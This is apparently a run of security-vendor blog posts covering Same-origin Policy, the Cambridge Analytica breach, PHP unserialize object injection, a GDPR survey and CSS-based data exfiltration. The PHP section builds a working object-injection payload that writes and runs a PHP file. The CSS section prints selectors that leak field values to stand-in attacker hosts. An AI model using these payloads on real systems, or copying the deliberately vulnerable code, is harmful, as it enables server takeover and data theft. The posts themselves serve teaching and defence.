
Sven Morgenroth Explains & Demos Same-origin Policy and How to Circumvent it


Sven Morgenroth of Netsparker gave a technical presentation entitled 'How to Circumvent the SOP and How to Get Hacked in the Process' during episode #550 of Paul's Security Weekly. The presentation was about the Same-origin Policy (SOP), one of the most important security policies in web browsers, and during the presentation Sven explained:

  • The origins of SOP and how it works, noting along the way that SOP isn't a single, standardized policy because it has developed over time.
  • Why web developers tend to dislike SOP. Hint: it makes life inconvenient for them. Developers want to relax the SOP so that their web applications on different origins (including domain-to-subdomain communication) can communicate with each other without having to deal with its intricacies.
  • Why SOP is a good security measure, but also why it comes with a cost. On the positive side, it is restrictive, and those restrictions can be lifted to allow web applications from different origins to communicate. The problem is that lifting them means allowing websites from other origins to access your data. There are different ways to achieve this, but all of them can create further problems if improperly implemented.

During the presentation Sven also ran a demo showing several exploits by which developers can circumvent the SOP:

  • JSON with Padding (JSONP) – a way to format JSON so that it can be included via a script tag
  • Cross-Origin Resource Sharing (CORS) – see the sketch after this list
  • Setting document.domain to the value of the main domain
  • The postMessage API
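For the CORS item, a minimal sketch (not from the episode) of the kind of misconfiguration Sven warned about might look like the hypothetical PHP endpoint below, which reflects the request's Origin header and allows credentials – effectively switching the SOP off for any site that asks:

<?php
// api/account.php (hypothetical): reflecting the Origin header back while also
// allowing credentials lets ANY origin read the authenticated response.
if (isset($_SERVER['HTTP_ORIGIN'])) {
    header('Access-Control-Allow-Origin: ' . $_SERVER['HTTP_ORIGIN']);
    header('Access-Control-Allow-Credentials: true');
}

header('Content-Type: application/json');
echo json_encode(['account' => 'data that should stay on this origin']);

A safer configuration would check the Origin header against an explicit whitelist of trusted origins before echoing it back.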

For each, Sven talked about how it works and what the dangers are. These are powerful tools for relaxing the SOP, but they have to be used with care, as it is easy to get them wrong. The episode ended with a brief Q&A session, as Joff Thyer and Keith Hoodlet joined the show.


Facebook & Cambridge Analytica Data Breach


What Happened with Cambridge Analytica?

When it was revealed that a company connected to President Trump's 2016 campaign, Cambridge Analytica (CA), had been able to access data from 50 million Facebook accounts, and that Facebook had suspended their (and SCL's) accounts, you probably reacted in one of three ways, depending on your normal habitat:

  • Regular users probably continued accessing their highly convenient web and mobile applications, mostly unconcerned
  • The wider technology industry, much better informed, dashed off a flurry of indignant tweets (using the #deletefacebook hashtag) and blog posts about personal security and corporations' lack of adherence to the rules
  • But, the web security industry, much more used to thinking and working at scale, sat up and paid close attention

It's difficult to wrap your brain around the numbers, yet if Facebook were a country, its population would lag behind only China and India. This is no small matter.


What's the Back Story?

  • The leak of data actually happened in 2015, aeons ago in technology terms. In a recent CNN interview conducted by Laurie Segall, Zuckerberg admitted that the data breach was a mistake, and that Facebook had neglected to inform affected users about it at the time. In the same interview, Zuckerberg called out a developer, Aleksandr Kogan, whom he accused of misusing information he had access to.
  • Cambridge Analytica's timeline records that their research partner, GSR, was reported by the Guardian in December of  2015 as having breached Facebook's terms of service and possibly the Data Protection Act. At the time, Facebook asked both GSR and Cambridge Analytica to delete the data.
  • Fast forward to March 2017, when CA ran an internal audit to ensure that all GSR data had been deleted, and then informed Facebook. Then in late 2017 and into the early part of this year, the Information Commissioner's Office (ICO) contacted CA to ask for details about how they processed data, including data on US nationals in the UK and alleged work on Brexit. CA reported that they cooperated fully, providing all requested information.
  • In March 2018, when Facebook suspended CA and SCL accounts, the full impact hit the public consciousness.

What Will Change at Facebook?

Zuckerberg revealed in the CNN interview that Facebook had over 15,000 people working on security, though he warned security was not something that could be solved 100%. And he was at some pains to point out that, while advertisers can take advantage of targeted advertising based on coveted demographics, Facebook does not actually sell that data – a common enough accusation levelled at many organisations with a similarly gargantuan user base.


Zuckerberg outlined the remediation activities that would now be put in place:

  • Cambridge Analytica would be investigated thoroughly, to see whether they still had access to the data
  • Developers would now have more restrictions placed on them
  • Those who developed apps for Facebook, who have access to large swathes of data, would also be investigated
  • Other suspicious activities would be examined

So far, so good – if staggeringly scant in detail, given the epic size of his security team.

For all such organisations, not just Facebook, we would like to see:

  • A copy of a new draft of the user agreement
  • The details of a few internal policies on how data is managed: some information on data capture, use, storage, sharing and destruction
  • And, ideally, even a facility in the style of the UK's Freedom of Information Act – under which individuals (within certain parameters) have the legal right to a copy of all the data that public sector bodies hold on them – that could be accessed online. Why not?

Are Blithe Consumers at Fault?

Flipping things right around, let's think like a consumer for a second. How many times a week do you willingly hand over data to someone?

  • You order your skinny latte and get asked at the end of the purchase whether you want a loyalty card. This may involve completing a form, containing at least your name, address and contact details. Think: where is this form then stored, until it is entered into a database? And, who has access to that database?
  • You download a health app to your device of choice and impatiently check the box to confirm that you've read the Terms and Conditions, which you presume includes some mention of how that organization handles your data.

The web security industry is singing from the same hymn sheet at least on this point. Consumers simply cannot have the entire weight of their own data security resting on their shoulders. It is up to application developers and vendors to ensure that what they develop follows Security by Design (a concept outlined in the EU's new GDPR regulation), takes proper account of Personal Data, and receives regular updates.

Which Takes Precedence? Data Portability or Data Security?

Data portability is the concept that while data may be collected by one organization for one purpose, it may later be used by the same (or another) organization, for a related, or entirely different, purpose – something we rely on every day. This accepted practice is standard within law enforcement and emergency services, for example, where, in certain extreme circumstances and within defined parameters, organisations can contact the authorities to help them pinpoint and investigate someone who may have expressed violent intentions on a web forum. Yet, on the other hand, while laws abound around data use and security, individuals and organizations, can and do, flout those parameters and regulations with alacrity.

Ask any one of our Security Researchers this question, and the answer on which takes precedence is going to be: Data Security, no doubt.

Yet if we all want the freedom offered by our smartphone apps and organizations want the convenience of sharing data to offer other services to their partner's consumers, we have to be willing to understand that our data is shared – many times with permission we granted years ago and not just in emergency situations.

And, as technology companies, perhaps we need to become much more adept at recognising when an opportunity we present to partners (access to reams of personal data) might just be too good to pass up. The GDPR regulations that all organizations handling data belonging to EU citizens must adhere to require not only that organizations identify and manage their own and their customers' data securely, but also that they investigate in detail how their partners, and those with whom they share data, handle it, and ensure that they comply with the same regulations. Did Facebook conduct due diligence in this case?

Further, do we, as organisations, have written policies, clear procedures and regular training for staff, contractors, developers and partners, to ensure that everyone who has access to personal and other data knows how it must be handled and follows those procedures? Do we have further procedures for discovering when this is not the case?

Data Security Goes Beyond Automated Vulnerability Scanning

As web applications increase in complexity, vendors have to consider the technical specifications, a robust and functional yet appealing UI, and code that is free of bugs. One of those specifications often concerns user permissions – who has access to the web application and to what level. When permissions are implemented incorrectly, exposing the web application, its users and their data, the result is often a logical vulnerability. One of the most easily recognised types concerns access control. And the reason that automated scanning tools are unable to detect these vulnerabilities is simply that, while logic and decision making are involved, this is more of a business decision made by someone familiar with the practices of the industry and the organization in particular, as well as with the web application.

Next month, the EU regulations will require all organizations that handle data belonging to EU citizens to adhere to fairly straightforward rules concerning who has access to the Personal Data we acquire from individuals and manage on their behalf. Organisations need to be able to answer the most simple of questions:

  • Who does this data belong to? And, who should have access to it?
  • Can we justify retaining it? And, for how long? What data retention process is in place to check that when data has served its usefulness, it is automatically placed on a disposal schedule?
  • Are we due to share it with other organizations, and do we have the owner's express permission to do so? And, can we demonstrate that those organizations in turn have similar access control, disposal and other security policies?
  • Do we know who currently has access to the data, both inside and outside our organization? If there are gaps in our security, have we put in place policies, permissions and checks to ensure that what we intended is what is actually happening?

Mark Zuckerberg announced that he was willing to testify in any U.S. government inquiry into the reported breach. He also stated that he was not opposed to regulation of his social media company and recognised that Facebook needed to be more publicly accountable. Many might add that such organisations should know the details of what partners and developers are doing on their behalf. In light of this latest breach, along with the infamous Equifax, Apache and Grammarly incidents, let's hope none of us end up in the unenviable position of the organisations involved – realising what damage such an epic breach can do to our brand, not to mention the unknown, individual consequences of a breach of all types of personal data.

Why You Should Never Pass Untrusted Data to Unserialize When Writing PHP Code


In PHP, as in every other programming language you use for web development, developers should avoid writing code that passes user-controlled input to dangerous functions. This is one of the basics of secure programming. Whenever a function has the capability to execute a dangerous action, it should either not receive user input, or the user-controlled data should be sanitized in order to prevent a malicious user from breaking the intended functionality.

In most scenarios, it's obvious why a given function argument should not be able to be controlled by the user. Many programming guides supply a list of relevant functions. The following (incomplete) list gives a few examples for PHP.

  • system, exec, passthru, shell_exec, backticks – These functions allow you to execute system commands. They should therefore never accept user-controlled input in their arguments.
  • include, require, include_once, require_once – Using one of these functions on user-controlled input can lead to local or remote file inclusion.
  • unserialize – Why this function is dangerous is very often left unexplained!

Serialization is generally used to convert an object into a string that can be stored and used later, passed to other functions, or cached in case it's going to be needed often; unserialize turns such a string back into an object. Almost every guide on developing secure PHP applications mentions the unserialize function, but few explain why you should never use it on user-supplied input.

The reality is that exposing this function can have serious consequences. In fact using user-controlled input in unserialize is so dangerous that even the developers of PHP stopped treating exploitable bugs in the C code that powers unserialize as security vulnerabilities (see Unserialize security policy).

This sounds a little confusing at first, but if you examine the PHP documentation, you will see that it suggests that you never use unserialize on user-supplied input. This is a very clear warning. The PHP language developers assume that you would never expose this function to an attacker. This means that even if someone discovers an exploitable buffer overflow in PHP (that's caused by unserialize), it will not be considered a security vulnerability by the PHP developers – because unserialize was never designed to be used in this way in the first place!

💡 It's worth pointing out that some popular PHP web applications, such as Joomla, WordPress and Piwik, have also suffered from PHP object injection vulnerabilities.

PHP Classes Crash Course

To understand the problem with unserialize, you first have to have a basic understanding of PHP classes. I created the class below and will explain to you how it works.
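The original listing was embedded as an image, so the class below is an approximate reconstruction based on the description that follows and on the serialized output shown later; the method bodies and exact line layout are assumptions.

<?php

class Logging
{
    public    $last_log, $last_time;
    protected $log_date, $username;
    private   $log_file;

    public function __construct($username)
    {
        $this->username = $username;
        $this->log_date = date('d-m-y');
        $this->log_file = 'logs/' . $username . '_' . $this->log_date . '.log';
        $this->createLog();
    }

    // Creates a new log file if it doesn't exist yet
    public function createLog()
    {
        if (!file_exists($this->log_file)) {
            touch($this->log_file);
        }
    }

    // Writes a new log entry into the file
    public function logAction($message)
    {
        $this->last_log  = $message;
        $this->last_time = time();
        file_put_contents($this->log_file, $message . PHP_EOL, FILE_APPEND);
    }

    // Called automatically when a serialized Logging object is deserialized
    public function __wakeup()
    {
        $this->createLog();
        $this->logAction($this->last_log);
    }
}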

  • In line 3, I created a name for the class, Logging.
  • In lines 5-7 I defined different properties (or variables) for the class. As you can see, I used the public, protected and private keywords. Their purpose is easily explained.

Properties

If I created a subclass from my Logging class, it would inherit all the public and protected properties. This means if I created a subclass named LoggingSubclass, I could access all the protected and public properties, while the private ones would be accessible only by the class that created them.

Even though both the public and protected properties can be inherited, there is a small difference between the two. You can get, and set, a public property as illustrated.
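Assuming the reconstructed class above, that difference looks roughly like this:

<?php
$log = new Logging('Alice');

$log->last_log = 'manual entry';   // public: can be set from outside the class
echo $log->last_log;               // ...and read back

echo $log->username;               // protected: fatal error outside the class hierarchy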

However, a protected property is only meant for internal use within the class and can't be accessed directly from outside. From my description, you have probably noticed that I didn't use the keywords entirely correctly in the example above: it would be enough to set them all to protected, as we don't need to access them externally. The reason I wanted to include all three keywords will become obvious later, when we examine the serialize function.

Magic Methods

You can see that I have defined the __construct method (or function). This is sometimes referred to as a 'magic method'. Magic methods are named after the specific action that leads to their execution. They're easily recognized by their two leading underscores.

For example __construct will be called as soon as we create a new instance of the class. This is done using the 'new' keyword displayed in the code above. We can pass arguments to the __construct method by writing them in parentheses after the class name: new Test('value'). If we create a new instance of a class, all its methods and properties are returned in an object we can easily access.

Later in the code, there is the method createLog, that creates a new log file if it doesn't yet exist, and then the logAction function writes a new log entry into the file. However, there is one method in the Logging class that we've not yet mentioned: __wakeup. You can tell that it's a magic method like __construct from its initial two underscore characters. However, instead of being called after a new instance of a class is created, __wakeup will be called as soon as a serialized object of the class is deserialized.

What is (De)serialization?

serialize()

Simply put, when you serialize an object, you create a string representation of it. To do this, you use the serialize function as illustrated below. Since the output may contain null bytes, which are not printable, I used the str_replace function to make them visible.
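Using the reconstructed Logging class, a sketch of that could be:

<?php
$log = new Logging('Alice');
$log->logAction('making a test entry');

// The output contains raw null bytes, which are invisible in a terminal or browser,
// so swap them for the literal marker '\x00' before printing.
echo str_replace("\0", '\x00', serialize($log));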

As you see, we have created a new instance of the Logging class, and chose 'Alice' as the username. We also made a test entry that should already be logged. If we look at the code, this should change the log_file property to something like 'logs/Alice_07-09-17.log' and the last_log property to 'making a test entry'.

Let's take a look at the serialized output:

O:7:"Logging":5:{s:8:"last_log";s:19:"making a test entry";s:9:"last_time";i:1504796057;s:11:"\x00*\x00log_date";s:8:"07-09-17";s:11:"\x00*\x00username";s:5:"Alice";s:17:"\x00Logging\x00log_file";s:23:"logs/Alice_07-09-17.log";}

Let's break down what's going on in this string.

O:7:"Logging":5:{ ... }

This is an object of our Logging class. Objects always begin with an uppercase 'O' in serialized strings. After a colon there is the number of characters in the class name, in this case '7'. After another colon, there is the actual class name in double quotes, followed by the number of properties ('5'). The properties are then listed within the curly brackets.

s:8:"last_log";s:19:"making a test entry";

This is a public property. The property name is a string, indicated by a lowercase 's', followed by the number of characters – in this case '8', because last_log has eight characters. After the semicolon, the property value follows using the same syntax.

s:11:"\x00*\x00log_date";s:8:"07-09-17";

This follows the same logic as above, but this time we have a protected property. Serialize indicates that the property is protected by putting '\x00*\x00' in front of the property name.

s:17:"\x00Logging\x00log_file";s:23:"logs/Alice_07-09-17.log";

This is what a private property looks like. Instead of the asterisk character, serialize puts the class name between the two null bytes. Keep in mind that serialize uses actual null bytes rather than the literal '\x00'. Remember this when you read serialize output, as null bytes are non-printable characters.


unserialize()

By using unserialize, we achieve exactly the opposite. Instead of turning an object into a string, we do it the other way around. We pass a string produced by serialize to the unserialize function, and turn it into an object. This will essentially use the object name and search for a corresponding class name. In our case, O:7:Logging:[...] would result in PHP searching for a class with the name 'Logging'. If it found one, it would then use all the properties from the serialized string and add them to the object.

Once this is done, the object is in the same state as it was before it was serialized. Therefore you can, for example, take the logging class, serialize it, and put the resulting string into a database and then deserialize it again when it's needed.
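A minimal round trip, again based on the reconstructed class, might be:

<?php
// Store the serialized object - a database column would work just as well as a file
file_put_contents('logging.cache', serialize(new Logging('Alice')));

// Later: turn the string back into an object; __wakeup() runs at this point
$log = unserialize(file_get_contents('logging.cache'));
$log->logAction('restored from the cache');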

Introducing PHP Object Injection

Let's summarize what we've discussed so far:

  • When we deserialize a serialized object the __wakeup method is called automatically
  • We can control any of the property values
  • We can control what class we want to create an object for
  • All we need in order to achieve what we want is user-controllable input in unserialize

Now let's imagine we have the following code:
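The original listing was an image; a minimal reconstruction that matches the description (and the GET parameter named data used later) would be something like:

<?php
// vulnerable.php (hypothetical file name) - the Logging class is assumed to be included
include 'logging.php';

// User-controlled input is passed straight to unserialize() - this is the bug
$object = unserialize($_GET['data']);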

As you can clearly see, there is an unserialize call that takes user input as its parameter. Let's assume the file with our Logging class from above is already included. Is there a way we can gain code execution?

First let's take a look at the magic method again.
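From the reconstruction above, this is the part that matters:

// Called automatically when a serialized Logging object is deserialized
public function __wakeup()
{
    $this->createLog();                  // creates the file at the path in $log_file
    $this->logAction($this->last_log);   // writes whatever is in $last_log into it
}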

There are two properties that matter here: log_file and last_log. With createLog we can create a file at the path in the log_file property, and with logAction we can write arbitrary data into it. To gain code execution, an attacker's goal would be to create a file with a .php extension and then write some PHP code into it. That means we need to pass a string to unserialize that contains a path to a file in the web root. From the code, we know that the logs/ directory should be writeable. So we need to add malicious PHP code. For a proof of concept, we can execute a system command, for example system('dir /b') on a Windows host. This would reveal all the files in the current directory.

Building an Exploit

Let's start with O:7:"Logging":2:{}, since we want the logging class.

Then we need to specify a file path. Let's choose s:17:"\x00Logging\x00log_file";s:12:"logs/poc.php";. As you can see, log_file is a private property, which is why we need to add \x00Logging\x00 in front of it.

Now we also need to add the PHP code that we want to execute. This code must go into the last_log property, so we need to add s:8:"last_log";s:26:"<?php system('dir /b'); ?>";.

The finished string we have to pass in the GET variable data is this:

O:7:"Logging":2:{s:17:"%00Logging%00log_file";s:12:"logs/poc.php";s:8:"last_log";s:26:"<?php system('dir /b'); ?>";}

After this, we can look at logs/poc.php to see if our exploit attempt was successful.

As you can see, the poc.php file was created and the PHP was parsed. The dir /b command executed successfully, and you can see that within the logs directory there are entries from 'Alice' and 'user'. Instead of this relatively harmless payload, an attacker could choose one that gives him a reverse shell which would help him to completely take over the server.

💡 Did you know? PHP Object Injection was once thought to be harmless due to a lack of useful __wakeup magic methods. However, in 2009, Stefan Esser explained in his talk Shocking News in PHP Exploitation that, with PHP 5's __destruct method and autoloading functionality, Object Injection had become a dangerous possibility in mainstream applications and frameworks.

Class Autoloading in PHP

We were lucky that the 'Logging' class was included in the page. But what happens when the class is in another file that we don't have access to? If we are lucky, there is an autoloading feature on the page. Whenever a class is called – or an object is deserialized – PHP searches for the class. If it is not found, it will simply throw an error. However, when a function like the following is defined somewhere, PHP will pass the class name to it and then attempt to load the class again. It is only if that attempt also fails that it throws an error.
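A minimal sketch of such an autoloader (real implementations usually use spl_autoload_register and more careful path handling):

<?php
// Called automatically whenever an unknown class is referenced - including during
// unserialize() - with the class name as its argument.
function __autoload($class_name)
{
    include $class_name . '.php';
}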

As you see, this can also lead to a Local File Inclusion (LFI), by deserializing a class name that matches the name of a PHP file on the server. While this does not seem useful at first, due to the forced .php extension, it can give attackers access to code that is otherwise inaccessible.

Defining Exactly Why the Unserialize Function is Dangerous

The impact of using user-controlled input together with the unserialize function strongly depends on the available magic methods and the code inside them. Aside from __wakeup, there are other magic methods that can be abused, for example __toString. The classes containing them don't even need to be included in the vulnerable page; they could be reached through the autoload functionality and external libraries in your project.

Finally, even if you don't have any exploitable methods, there can still be exploitable bugs in the underlying C code in PHP, which can be abused using unserialize. But, they are not considered to be security issues and are therefore given a lower priority by the PHP developers.

It is at this point that we can complete the unserialize entry from the list above with the appropriate content.

  • unserialize – Reasons to be (super) careful: this function can be abused by attackers to gain remote code execution, local file inclusion and a wide range of other vulnerabilities, depending on the code within the available magic methods. Attackers abuse it by deserializing their own malicious PHP objects.

Our conclusion and recommendation is that you should never use unserialize on user input.

Introducing the Same-origin Policy Whitepaper


Same-origin Policy (SOP) is a set of restrictions originally implemented by Netscape developers to help securely manage the relationships and connections between web resources such as HTML documents and other content, APIs and cookies. It defines each resource's origin as the combination of the protocol, host and port used to locate it. Resources with the same origin are able to access each other's contents.

SOP is used to counter attacks that have the same effect as one of the most prevalent web application vulnerabilities, cross-site scripting. Browsers simply prevent users from accessing and altering content that does not meet the same-origin rules (even though they enable web technologies that send and receive requests across various origins, they still provide a high level of security).

We have just published The Definitive Guide to Same-origin Policy. It discusses the following key topics:

  • What would the development world look like, and how secure would it be, without the Same-origin Policy?
  • A definition of Same-origin Policy, including common misconceptions
  • How Same-origin Policy is implemented for different types of content, with some warnings concerning DOM Access and Web 2.0
  • Cross-Origin Resource Sharing (CORS) in relation to simple and preflight requests, and cookies
  • SOP for rich web applications

Finally, it ends with a concluding section on Next Generation Same-origin Policy looking beyond the loosely-defined concepts of Web 2.0 to the modern day context of HTML5 and Cross Domain Messaging.

This whitepaper has been jointly authored by Alex Baker, together with Ziyahan Albeniz and Emre Iyidogan, two of Netsparker's own Security Researchers.

Netsparker Surveys US Based C-Levels on GDPR Compliance


On May 25, 2018, all businesses that handle the Personal Data of EU-based citizens are required to be GDPR compliant. Otherwise, they risk a fine of up to €20 million or 4% of their annual global turnover, whichever is higher.

Since the EU's population is over half a billion, the majority of businesses deal with EU citizens, either as their customers, employees or business partners. Considering the importance of the General Data Protection Regulation for businesses, we surveyed 302 C-level executives of US businesses to gain insight into how non-EU businesses are addressing GDPR – what they are doing to adhere to the regulation, how much effort is needed and how much it is costing them.

Table of Contents

  1. Who Answered the GDPR Survey?
  2. Are Businesses Ready for GDPR?
  3. Are Employees Aware of GDPR?
  4. Are Businesses Receptive to GDPR?
  5. Are Businesses Well Equipped to Achieve GDPR Compliance?
  6. What Changes Are Businesses Making in Order to Become GDPR Compliant?
    1. How Many People Do Businesses Have to Recruit Because of GDPR?
  7. How Much Are Businesses Spending on GDPR Compliance?
  8. What Impact Will GDPR Have?
    1. GDPR Means More Secure Web Applications
    2. Does GDPR Mean Better Handling of Personal Data and Response to Data Breaches?
    3. Consumers' Reactions to Data Breaches
  9. Is GDPR a Step in the Right Secure Direction?
    1. Is Your Business GDPR Ready?

Who Answered the GDPR Survey?

The respondents all hold C-Level positions. The majority are CEOs, followed by CSOs, CISOs and CIOs.


Are Businesses Ready for GDPR?

Only 1% of those surveyed have not yet done anything to become compliant. The majority of businesses are already working on becoming GDPR compliant, and almost half of them (48.7%) have completed more than 75% of the required work.


What's even better is that 71.2% of respondents believe they will be GDPR compliant before the deadline kicks in (May 25, 2018), while 26.5% think they are on the right track and should be ready by the deadline. Only 2.3% are unlikely to be ready on time.


Are Employees Aware of GDPR?

GDPR has received a lot of media coverage – much more than PCI DSS, HIPAA, ISO standards and other regulatory or compliance measures and bodies. Both news outlets and vendors are giving it lots of attention. Could it be that the general population is becoming more concerned about privacy, and so businesses are attempting to address this additional customer demand? Or is such coverage the natural consequence of the alarmingly hefty fines that follow if businesses fail to comply? It's not surprising, then, to discover that an impressive 90% of the employees who work with the respondents are also aware of GDPR.


Are Businesses Receptive to GDPR?

Compliance with government legislation is not something that businesses like. Typically, it brings with it additional expense, more complex procedures and slower production. So, it’s remarkable to see that 88.1% of our respondents said that all their business peers are receptive to GDPR, and that the majority of the employees are complying.

Keeping this receptive approach in mind, there are notable differences between industry verticals in how this is implemented. For example, respondents from the Science, Technology, Programming, Accounting, Finance and Banking sectors are 35% more likely to receive organization-wide cooperation in achieving GDPR compliance than those in the Healthcare industry.


Are Businesses Well Equipped to Achieve GDPR Compliance?

Among our results, 62.9% of respondents said that their team knows enough about GDPR and are doing everything in house, while 27.8% hired third party service firms to assist them with achieving compliance. Less than 10% said they have not found enough information – a figure I find hard to swallow, given that it seems that almost every business and news outlet in the security industry has written about GDPR. We have published the Road to GDPR Compliance Whitepaper, an easy to follow, high level guide on how businesses can become GDPR compliant.


What Changes Are Businesses Making in Order to Become GDPR Compliant?

Compliance means more work, stricter controls and more complex procedures. So working towards compliance means at least changes to some systems, but for many businesses could also mean recruiting new people. Let’s see what changes businesses are going through in order to achieve compliance.


Only 0.3% said that they do not need to make any changes, which we presume means that they were already GDPR compliant even before GDPR was announced.

How Many People Do Businesses Have to Recruit Because of GDPR?

This is where the numbers get interesting. It turns out that there is a lot of headhunting going on! A total of 55% of those businesses who have a dedicated team for compliance have recruited more than six additional employees to assist them to achieve GDPR compliance.

Currently, 82% of companies surveyed have a DPO on their staff, while 77% plan to hire a new, replacement DPO prior to the GDPR target date of May 25, 2018. What's certain is that, even though we are in the digital era where lots of work is automated, the number of people a business needs to become GDPR compliant correlates with the number of employees the business has: the more employees a business has, the bigger the compliance team.


How Much Are Businesses Spending on GDPR Compliance?

As above with the number of employees, the bigger the business is, the more it spends on GDPR. The majority, 59.6%, will spend somewhere between $50,000 and $1 million, while 10.3% will spend more than $1 million to become GDPR compliant.


What Impact Will GDPR Have?

News of data leaks, stolen credit cards, fraud and identity theft has become so frequent that the general population is very aware of the need for more secure services that guard their data and personal privacy. So what impact will GDPR have on businesses and industries that serve these savvy and demanding consumers once it comes into force?

GDPR Means More Secure Web Applications

Web applications are the centre of many modern business, government and consumer services. Online services are web applications, the cloud is a collection of web applications and businesses collect and share the majority of their data via web applications and web APIs. It is easy to conclude that GDPR should have a positive impact on the security of applications, or so the majority of respondents think. Only 2% disagree.


Does GDPR Mean Better Handling of Personal Data and Response to Data Breaches?

The last few years have witnessed many data breaches. What is even worse is watching how businesses handle them: some have tried to hide them, some have announced them years later, and some were unaware that their networks had been hacked and data had been leaked.

So will businesses now adopt a more ethical approach? Of those asked, 54.3% believe that businesses will be even more hesitant to report data breaches because of the punitive fines. On the other hand, 53.6% believe that businesses will no longer hide data breaches. Many others are of the opinion that it won’t change anything. We shall see…


Consumers' Reactions to Data Breaches

Let’s assume that businesses will disclose all data breaches. Will this increased exposure – mainly because of GDPR – have an impact on consumers? The majority think that it will drive consumers to be more assertive in asking businesses what they are doing with their data and how they are handling it.

We are already noticing this in Europe, especially in countries such as Germany and the Netherlands that are very strict on consumer privacy. Will other nations follow? This consumer behaviour has a huge impact, and should be encouraged if we want to see a drastic improvement in security and privacy.


Is GDPR a Step in the Right Secure Direction?

The GDPR survey results above are very positive. Businesses are on the right track and are very receptive. Maybe it is still too early to say that data leaks and identity theft are a thing of the past, but we are certainly heading in the right direction.

Is Your Business GDPR Ready?

Do you handle any EU citizen data? If the answer is 'yes', your business needs to be GDPR compliant. We have written an easy to follow guide called The Road to GDPR Compliance, which will help you get started and ensure your business is GDPR compliant before the deadline. You can also get in touch with us to learn how Netsparker can help you with GDPR compliance.

How Private Data Can Be Stolen with a CSS Injection


Modern browsers do an excellent job defending web applications against reflected Cross-site Scripting (XSS). They do so by using XSS filters that allow them to reliably block such attacks in the majority of cases.

Though these filters were often bypassed in the past, modern versions constitute a huge step toward a secure web, free from one of its most prevalent vulnerabilities. The way these filters work is rather simple, yet highly effective. When your browser issues a request to a website, its inbuilt Cross-site Scripting filter checks whether:

  • Executable JavaScript is found in the request to a website, such as a <script> block or an HTML element with an inline event handler
  • The same executable JavaScript is found in the response from the server

If both conditions are met, the filter concludes that the script was reflected from the request and prevents it from executing.

In theory, this works well, but the consequence is that there is no protection from stored XSS attacks. To defend against such a common vulnerability, it's important to implement a proper Content Security Policy (CSP).

The procedure described above is closely tied to the X-XSS-Protection header. For a long time, the default behaviour has been the equivalent of '1', which tells the browser to filter out the malicious script but still render the page. More recently, Google Chrome changed its default to the equivalent of '1; mode=block', meaning 'prevent the whole page from loading'. This change in default behaviour comes at a time when most browsers have caused hackers immense frustration by drastically reducing the opportunities for exploiting a reflected XSS vulnerability.
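For reference, a site can request the stricter behaviour explicitly; a minimal sketch in PHP:

<?php
// Ask the browser to block the whole page, rather than just filtering out the
// offending script, whenever its reflected-XSS filter triggers.
header('X-XSS-Protection: 1; mode=block');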

Hackers Are Determined to Find Ways Around All Types of Web Security

A dangerous, if admirable, characteristic of most hackers is that they don't accept defeat. Some are even pleased when they encounter a Web Application Firewall (WAF): the restrictions they then need to bypass are exactly what makes such targets so fascinating to attackers.

Attackers are forced to get creative when encountering a filter. And they learn more each time they succeed.

So if browsers lock the front door by blocking reflected XSS, hackers will simply investigate whether they can smash some windows instead!

Mike Gualtieri, a Cyber and Information Security expert from Pittsburgh, seems to be the kind of hacker that perfectly matches this description. But he took it one step further, as outlined in his post Stealing Data With CSS: Attack and Defense.

As we have already established, Google Chrome mostly attempts to prevent malicious JavaScript from running in the browser, because running scripts to steal sensitive information is exactly what many attackers try to do. But what if they don't actually need JavaScript in order to exfiltrate the data we want to read?

Stealing Your Private Data With Cascading Style Sheets

JavaScript and HTML are not the only native languages that all major web browsers support. For at least 20 years, Cascading Style Sheets (CSS) have been part of this group. It's not surprising that CSS has seen some major changes since its inception. What started as a way to paint a red dotted border around your div tags became a highly functional language, enabling modern web design with features such as transitions, media queries and attribute selectors.

Instead of focusing solely on the obvious methods – using JavaScript or HTML – Mike Gualtieri found a way to exfiltrate data using CSS without Google Chrome's XSS filter catching him in the act. The key component of the attack, which he called 'CSS Exfil', is attribute selectors.

As we've already discovered, CSS evolved over time and became increasingly complex. Did you know, for example, that you could set the color for every link that begins with 'https://netsparker.com/' on your website to green, just by using CSS? You can view how easy it is to do on JSFiddle (look, no JavaScript!).

An everyday CSS selector may look similar to this one:

a {
   color: red;
}

This will select all <a> tags and set the color of their link text to red. This doesn't allow a great degree of flexibility though, and may even interfere with the rest of your web design. It's possible that you may want to set the color of internal links to a different color than external ones, in order to make it easier for visitors to see which link will navigate away from your website. What you can do is create a class like the one below and apply it to all anchor tags that point to internal links:

.internal-link {
   color: green;
}

This is not necessarily an ideal situation; it adds more HTML code and you need to manually check that the correct class has been set for all internal links. Conveniently, CSS provides an easier solution to this problem.

Selecting CSS Attributes

CSS Attribute Selectors enable you to set the color of every link that begins with 'https://netsparker.com/' to green, for example:

a[href^="https://netsparker.com/"] {
   color: green;
}

This is a nice feature, but what does this have to do with data exfiltration? Well, it's possible to issue outgoing requests by using the background directive in conjunction with url. If we combine this with an attribute selector, we can easily confirm the existence of certain data within HTML attributes on the page:

<style>
   input[name="pin"][value="1234"] {
      background: url(https://attacker.com/log?pin=1234);
   }
</style>
<input type = "password" name = "pin" value = "1234">

This CSS code will select any input tag that contains the name 'pin' and the value '1234'. By injecting the code into the page between the <style> tags, it's possible to confirm that our guess was correct. If the pin was '5678', the selector wouldn't match the input box and no request would be issued to the attacker's server. This example does not describe the most useful attack out there, but it may be used to deanonymize users.

This is another example of how such exfiltration may work. It is directly taken from Mike Gualtieri's previously mentioned work.

<html>
<head>
   <style>
       #username[value*="aa"]~#aa{background:url("https://attack.host/aa");}#username[value*="ab"]~#ab{background:url("https://attack.host/ab");}#username[value*="ac"]~#ac{background:url("https://attack.host/ac");}#username[value^="a"]~#a_{background:url("https://attack.host/a_");}#username[value$="a"]~#_a{background:url("https://attack.host/_a");}#username[value*="ba"]~#ba{background:url("https://attack.host/ba");}#username[value*="bb"]~#bb{background:url("https://attack.host/bb");}#username[value*="bc"]~#bc{background:url("https://attack.host/bc");}#username[value^="b"]~#b_{background:url("https://attack.host/b_");}#username[value$="b"]~#_b{background:url("https://attack.host/_b");}#username[value*="ca"]~#ca{background:url("https://attack.host/ca");}#username[value*="cb"]~#cb{background:url("https://attack.host/cb");}#username[value*="cc"]~#cc{background:url("https://attack.host/cc");}#username[value^="c"]~#c_{background:url("https://attack.host/c_");}#username[value$="c"]~#_c{background:url("https://attack.host/_c");}
   </style>
</head>
<body>
   <form>
       Username: <input type="text" id="username" name="username" value="<?php echo $_GET['username']; ?>" />
       <input id="form_submit" type="submit" value="submit"/>
